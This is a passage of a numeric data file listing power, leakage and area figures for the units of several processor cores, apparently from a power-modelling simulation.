'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.371823,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.911432,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.0238,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000824659,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000824659,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000720848,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000280459,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.001337,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00370716,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00781487,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0894731,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.69125,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.234878,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.303891,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.1902,
'Instruction Fetch Unit/Runtime Dynamic': 0.639764,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0752046,
'L2/Runtime Dynamic': 0.0190957,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.6102,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.64725,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.109127,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.109127,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.12762,
'Load Store Unit/Runtime Dynamic': 2.29455,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.269089,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.538177,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0955005,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.096578,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.353861,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0386585,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.677462,
'Memory Management Unit/Runtime Dynamic': 0.135237,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 25.3178,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.521614,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0240286,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.170742,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.716385,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 6.82883,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.063862,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.252849,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.377135,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.159748,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.257667,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.130062,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.547476,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.124885,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.71321,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0712489,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00670053,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0710506,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0495546,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.142299,
'Execution Unit/Register Files/Runtime Dynamic': 0.0562551,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.165653,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.404172,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.66613,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000716169,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000716169,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000643745,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000260123,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000711855,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00278794,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00615331,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0476381,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.03019,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.131623,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.1618,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.39576,
'Instruction Fetch Unit/Runtime Dynamic': 0.350003,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0342408,
'L2/Runtime Dynamic': 0.00773407,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.94187,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.829599,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0551528,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0551528,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.20231,
'Load Store Unit/Runtime Dynamic': 1.15675,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.135997,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.271995,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0482659,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0487271,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.188406,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0217347,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.427427,
'Memory Management Unit/Runtime Dynamic': 0.0704619,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.3624,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.187423,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00948827,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0776506,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.274562,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.52564,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0492287,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.241355,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.260146,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.123302,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.198882,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.100389,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.422572,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.101137,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.48232,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0491471,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00517184,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0560611,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0382489,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.105208,
'Execution Unit/Register Files/Runtime Dynamic': 0.0434208,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
